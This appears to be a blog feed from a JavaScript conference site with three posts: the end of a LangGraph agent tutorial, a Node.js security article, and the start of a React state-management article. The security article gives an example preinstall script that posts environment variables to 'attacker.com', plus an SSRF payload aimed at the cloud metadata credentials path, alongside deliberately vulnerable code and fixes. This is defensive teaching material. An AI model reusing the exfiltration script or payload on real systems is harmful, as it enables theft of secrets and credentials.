If the LLM receives a request that requires the current time to answer, it does not provide a direct answer, but informs the application that the ToolNode should be executed. In the example, the function can only be executed without receiving any additional parameters. However, you also have the option of defining parameters via the schema that the LLM passes on when called, and which you can access in the Tool function. This allows you to control the execution of this function and deliver a suitable result. It is important to define a description for the values in the schema using the describe method. The tool function does not yet create a node for LangGraph. To do this, you must pass the created object in an array to the constructor of the ToolNode class.

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.

Structure of the application graph

Figure 1: Structure of the application graph

The graphical representation reveals another special feature. You can use the addConditionalEdges method to insert a branch. Implement this in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a Tool call. If this is the case, the process is forwarded to the ToolNode. Otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a Tool node to counteract the weakness of LLMs that do not know anything about current or dynamic data. It also shows the essential features of a LangGraph application, but also the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model responds with a correct answer. The time you return here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich is suddenly in a time zone 6 hours behind UTC. In addition, during testing, the results for German queries were significantly worse than for the English version, even though all prompts were in German. To solve the time zone problem, you could, for example, register another tool that resolves the time zones correctly and uses this information to obtain the correct time. In the next example application, you will learn about another use case for LangChain that differs more significantly from the usual chatbot application.

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM to perform a very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application is designed to evaluate images of products and recognize which and how many products are depicted. The products are placed in the shopping cart and the price for the individual products and the entire shopping cart is determined. At the end, the application outputs a tabular list of the shopping cart. The application is based on Node.js and is operated via the command line. The product images are stored in the file system and are read in when used. Communication takes place via command-line input.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
type CartItem = StateType['cart'];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Visualization of GraphState

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. By formulating the prompt in this way, you have ensured that you will receive valid JSON as a response, which you can insert directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What 
            product do you see and how many are there. Answer in 
            the following json string structure 
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    const clonedState = { ...state };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

This is another simplification for our example. The CalculatePrice node reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but also significantly increases the response time in most cases.

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the Array-reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a simplification of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if you only specify the structure of part of the GraphState, LangGraph will only update that part. Here, another standard behavior of the library comes into play. If you do not define a reducer function when creating the GraphState, LangGraph will overwrite the value with the update. For a simple number, this behavior is not a problem. However, with an object structure such as the cart state, this can become a problem. Here, you can implement the desired behavior yourself using a reducer.

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application is terminated, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and draws from the GraphState. This node only accesses the state in read-only mode and outputs it unchanged as the return value. This node is also the end of the GraphState and is connected via an edge to the end node, which terminates the application.

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and enter the StateGraph. The graph of this application describes a circle. Here, you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only occurs if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To mitigate the restriction and increase the shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The connections between these nodes and the edges determine the flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application and pause your application if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move the implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition, validation, and TypeScript.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection, NoSQL injection, to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only a part of it.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Problems with the JavaScript ecosystem are heavily dependent on dependencies. A typical Node.js project depends on hundreds of third-party packages, which is a huge attack surface that isn’t contained in your own code. This has been shown to be the case with recent supply chain attacks on popular npm packages. Not all security threats can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty is left to developers to ensure that they include security checks and measures in every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic and vulnerabilities are often uncovered and patched within widely used packages. This means that dependencies that aren’t regularly updated can put your application at risk of being exploited while the fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies

npm audit

# Fix vulnerable dependencies

npm audit fix

# For major version updates that npm audit fix can't automatically resolve

npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges

{

  "dependencies": {

    "express": "4.17.1",  // Good: exact version

    "lodash": "^4.17.20"  // Risky: accepts any 4.17.x version above 4.17.20

  }

}

//Use package-lock.json or npm shrinkwrap to lock all dependencies 

//Example using npm-package-integrity:




const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {

  if (results.compromised.length > 0) {

    console.error('Compromised packages detected:', results.compromised);

    process.exit(1);

  }

});

Dependency Confusion Attacks

Dependency confusion attacks occur when package managers download dependencies from both public and private registries and can result in the use of public packages when there are private packages with higher versions available. This can happen when there’s a private package name in the public registry with a higher version and the package manager could pull the public version.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you install the malicious package, npm will find the higher version in the public registry and install the package from the attacker.

Example Workflow:

  1. When you install a malicious package, the attacker might run a script when the package is installed.
// Malicious package preinstall script

// This runs automatically when the package is installed

const fs = require('fs');

const https = require('https');




// Stealing environment variables

const data = JSON.stringify({

  env: process.env,

  path: process.cwd()

});




// Sending data to attacker's server

const req = https.request({

  hostname: 'attacker.com',

  port: 443,

  path: '/collect',

  method: 'POST',

  headers: {'Content-Type': 'application/json'}

}, res => {});




req.write(data);

req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{

  "name": "my-project",

  "version": "1.0.0",

  "dependencies": {

    "@yourcompany/internal-package": "1.2.3"

  },

  "publishConfig": {

    "registry": "https://registry.yourcompany.com"

  }

}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, this can be done incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: None or insecure algorithms like HMAC with small keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Invalidating tokens that have not been signed, expired or targeted.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code

const secret = 'mysecretkey';

app.post('/login', (req, res) => {  

  // Create token with no expiration or audience validation

  const token = jwt.sign({ userId: user.id }, secret);

  res.json({ token });

});

app.get('/protected', (req, res) => {

  try {

    // No token validation or structure checks

    const token = req.headers.authorization.split(' ')[1];

    const decoded = jwt.verify(token, secret);

    
    // No additional checks on decoded token content

    res.json({ data: 'Protected resource' });

  } catch (error) {

    res.status(401).json({ error: 'Unauthorized' });

  }

});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Issue: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');

const fs = require('fs');

require('dotenv').config();




// Load JWT secret from environment variable

const secret = process.env.JWT_SECRET;

if (!secret || secret.length < 32) {

  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');

}




app.post('/login', async (req, res) => {

  // Create token with proper claims

  const token = jwt.sign(

    { 

      userId: user.id,

      role: user.role

    },

    secret,

    { 

      expiresIn: '1h',

      issuer: 'my-app',

      audience: 'my-api',

      notBefore: 0

    }

  ); 

  // Send token in HttpOnly cookie

  res.cookie('token', token, {

    httpOnly: true,

    secure: process.env.NODE_ENV === 'production',

    sameSite: 'strict',

    maxAge: 3600000 // 1 hour

  });

  

  res.json({ message: 'Authentication successful' });

});




app.get('/protected', (req, res) => {

  try {

    // Extract token from cookie (not from headers)

    const token = req.cookies.token;

    

    if (!token) {

      return res.status(401).json({ error: 'Authentication required' });

    }  

    // Verify token with all necessary options

    const decoded = jwt.verify(token, secret, {

      issuer: 'my-app',

      audience: 'my-api'

    })    

    // Additional validation

    if (decoded.role !== 'admin') {

      return res.status(403).json({ error: 'Insufficient permissions' });

    }  

    res.json({ data: 'Protected resource' });

  } catch (error) {

    if (error.name === 'TokenExpiredError') {

      return res.status(401).json({ error: 'Token expired' });

    }

    res.status(401).json({ error: 'Invalid token' });

  }

});

This above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT token is saved in an HttpOnly cookie with secure and SameSite=strict flags, making it immune to XSS and CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Side Request Forgery (SSRF) is a type of vulnerability where attackers can make servers make requests to unintended targets. This is problematic in the Node.js environment since HTTP requests are easy to make, especially with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');

const axios = require('axios');

const app = express();




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  try {

    // User can control the URL completely

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s see a secure way of the implementation:

const express = require('express');

const axios = require('axios');

const URL = require('url').URL;

const app = express();




// Define allowed domains

const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  

  try {

    // Validate URL format

    const parsedUrl = new URL(url);

    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {

      return res.status(403).json({ error: 'Domain not allowed' });

    } 

    // Proceed with request to allowed domain

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Then we check if the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.
  1. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // Downloads from any URL without validation

    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });

    const imageBuffer = Buffer.from(response.data);

    

    // Save to local storage

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Look up the hostname to IP using dns lookup. Avoid using private networks (10.x.x.x, 172.16.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) to avoid disclosing information that can be used to reach resources on the internal network and to prevent SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;




app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // 1. Validate URL format

    const parsedUrl = new URL(imageUrl);

    

    // 2. Only allow http/https protocols

    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {

      return res.status(403).json({ error: 'Protocol not allowed' });

    }

    

    // 3. Resolve hostname to IP

    const { address } = await dns.lookup(parsedUrl.hostname);

    

    // 4. Block private IP ranges

    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {

      return res.status(403).json({ error: 'Cannot access internal resources' });

    }

    

    // 5. Now safe to proceed

    const response = await axios.get(imageUrl, { 

      responseType: 'arraybuffer',

      maxRedirects: 0 // Prevent redirect-based bypasses

    });

    

    const imageBuffer = Buffer.from(response.data);

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock or take over systems:

  1. Distributed Denial of Service (DDoS): Your server is flooded by many requests from so many attackers that legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools to try and login to your application with random combinations of credentials in an attempt to guess the valid authentication credentials.
  3. Scraping and Harvesting: Your application is accessed by bots to make many requests to gather content from your application, affecting performance and data leakage.
  4. API Abuse: API requests to use up resources or to take advantage of the free tiers usually reserved for your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');


const apiLimiter = rateLimit({

  windowMs: 15 * 60 * 1000,

  max: 100, // limit each IP to 100 requests per windowMs

  message: 'Too many requests, please try again later.'

});

app.use('/api/', apiLimiter); // Apply to all API endpoints

app.use('/api/', apiLimiter);

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints are usually more secure than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The library node-rate-limiter-flexible helps enhance features like Redis-based distributed rate limiting for apps deployed on multiple servers.

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is better to approach from the infrastructure-level and use the application-level security as the secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can serve as a barrier, perform rate limiting, and work as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offers integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: It can be used to distribute traffic across multiple instances, increasing the load and filter suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits are with infrastructure level defenses like reverse proxies, CDN, and WAF to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: This is only possible if you understand strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Step-by-step measures should be taken beginning with slight delays, temporary blockage, and permanent IP blockage for severe attackers as per the frequency and severity of suspicious activities.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Some recommended libraries include express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and making potential critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common denominator, i.e., the parent component for all that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

